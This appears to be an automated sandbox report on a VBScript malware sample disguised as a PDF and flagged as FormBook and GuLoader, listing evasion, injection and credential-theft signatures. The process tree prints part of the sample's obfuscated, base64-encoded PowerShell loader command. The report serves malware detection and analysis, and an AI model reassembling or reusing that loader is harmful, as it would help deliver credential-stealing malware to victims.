Edit tour
Windows
Analysis Report
Wire-84844663637346665.PDF.vbs
Overview
General Information
Detection
FormBook GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Found malware configuration
Detected FormBook malware
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Hides threads from debuggers
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Potential evasive VBS script found (sleep loop)
Maps a DLL or memory area into another process
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Potential malicious VBS script found (has network functionality)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Encrypted powershell cmdline option found
Very long command line found
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses an obfuscated file name to hide its real file extension (double extension)
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Sigma detected: Suspicious Execution of Powershell with Base64
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Classification
- System is w10x64
- wscript.exe (PID: 6204 cmdline:
C:\Windows \System32\ wscript.ex e "C:\User s\user\Des ktop\Wire- 8484466363 7346665.PD F.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C) - powershell.exe (PID: 6480 cmdline:
C:\Windows \SysWOW64\ WindowsPow erShell\v1 .0\powersh ell.exe" - EncodedCom mand "IwBC AGEAYwBvAG 4AZwAgAFMA bABlAHQAbg AgAEYARQBK AEwAUABMAE EAIABWAGkA bgBkAGYAbA A0ACAAZgBh AHIAYQAgAG EAcgB0AGUA cgAgAE8Adg BlAHIAYQBy AG8AIABDAE kATgBFAE4A RQBHACAARA BkAHMAbwBm AHIAZQByAD EAIABCAFIA SQBUAFQATA BFAFAAQQAg AFMAZQBtAG kAYwBvAHIA bwBuACAAQg B1AG4AZABk AHkAcgBlAD EAIABVAE4A TQBBAE4AQQ BHACAAUgBJ AEMATwBDAE gARQBUACAA aABlAG4Acg BlAGcAbgAg AEkAbgBkAG QAZQBsAGkA bgBnAGUAMQ AgAFIATwBU AEEAVABJAC AATwB2AGUA cgBmAG8AZA ByAGUAcwAx ACAAUQBVAE kARQBUACAA YQByAGEAYg BhAG4AIABJ AE4ARABEAC AAdQBiAGUA dABpAG0AZQ AgAGEAawB0 AGkAdgBpAH MAdAAgAHAA ZQByAHQAdQ ByAGIAZgAg AEoAQQBHAE UAUgBFAE4A IABLAEkATA BPAE0ARQBH AEEAIABBAG MAaABvAG4A ZAByACAAQg BuAG4AZQAg AEMAbwBuAG cAcgBlAGcA MwAgAEIAUg BBAE4ARABF AE4AIABJAG 4AZwBlAG4A aQByAHQAMg AgAFIAZQB2 AG8AIABTAG MAaQByACAA DQAKAA0ACg ANAAoAQQBk AGQALQBUAH kAcABlACAA LQBUAHkAcA BlAEQAZQBm AGkAbgBpAH QAaQBvAG4A IABAACIADQ AKAHUAcwBp AG4AZwAgAF MAeQBzAHQA ZQBtADsADQ AKAHUAcwBp AG4AZwAgAF MAeQBzAHQA ZQBtAC4AUg B1AG4AdABp AG0AZQAuAE kAbgB0AGUA cgBvAHAAUw BlAHIAdgBp AGMAZQBzAD sADQAKAHAA dQBiAGwAaQ BjACAAcwB0 AGEAdABpAG MAIABjAGwA YQBzAHMAIA BIAGEAbgBk AGwAMQANAA oAewANAAoA WwBEAGwAbA BJAG0AcABv AHIAdAAoAC IAbgB0AGQA bABsAC4AZA BsAGwAIgAp AF0AcAB1AG IAbABpAGMA IABzAHQAYQ B0AGkAYwAg AGUAeAB0AG UAcgBuACAA aQBuAHQAIA BOAHQAQQBs AGwAbwBjAG EAdABlAFYA aQByAHQAdQ BhAGwATQBl AG0AbwByAH kAKABpAG4A dAAgAEgAYQ BuAGQAbAA2 ACwAcgBlAG YAIABJAG4A dAAzADIAIA BOAE8ATgBN AEEATABJAE cALABpAG4A dAAgAG0AZQ B0AGEAdABl AGcAbgAsAH IAZQBmACAA SQBuAHQAMw AyACAASABh AG4AZABsAC wAaQBuAHQA IABCAG8Acg BkAHMAawA2 ACwAaQBuAH QAIABIAGEA bgBkAGwANw ApADsADQAK AFsARABsAG wASQBtAHAA bwByAHQAKA AiAGsAZQBy AG4AZQBsAD MAMgAuAGQA bABsACIAKQ BdAHAAdQBi AGwAaQBjAC AAcwB0AGEA dABpAGMAIA BlAHgAdABl AHIAbgAgAE kAbgB0AFAA dAByACAAQw ByAGUAYQB0 AGUARgBpAG wAZQBBACgA cwB0AHIAaQ BuAGcAIABE AEEAVQBHAE gAVABFAFIA LAB1AGkAbg B0ACAAVABh AG4AegBhAG 4AaQA1ACwA aQBuAHQAIA BoAGEAYQBu ACwAaQBuAH QAIABIAGEA bgBkAGwAMA AsAGkAbgB0 ACAARgBhAG wAbABhAGMA aQBlAHMANQ AsAGkAbgB0 ACAAQgBHAE UAUgAsAGkA bgB0ACAAUQ B1AGkAbgBx AHUAZQA3AC kAOwANAAoA WwBEAGwAbA BJAG0AcABv AHIAdAAoAC IAawBlAHIA bgBlAGwAMw AyAC4AZABs AGwAIgApAF 0AcAB1AGIA bABpAGMAIA BzAHQAYQB0 AGkAYwAgAG UAeAB0AGUA cgBuACAAaQ BuAHQAIABS AGUAYQBkAE YAaQBsAGUA KABpAG4AdA AgAG0AZQB0 AGEAdABlAG cAbgAwACwA dQBpAG4AdA AgAG0AZQB0 AGEAdABlAG cAbgAxACwA SQBuAHQAUA B0AHIAIABt AGUAdABhAH QAZQBnAG4A MgAsAHIAZQ BmACAASQBu AHQAMwAyAC AAbQBlAHQA YQB0AGUAZw BuADMALABp AG4AdAAgAG 0AZQB0AGEA dABlAGcAbg A0ACkAOwAN AAoAWwBEAG wAbABJAG0A cABvAHIAdA AoACIAdQBz AGUAcgAzAD IALgBkAGwA bAAiACkAXQ BwAHUAYgBs AGkAYwAgAH MAdABhAHQA aQBjACAAZQ B4AHQAZQBy AG4AIABJAG 4AdABQAHQA cgAgAEMAYQ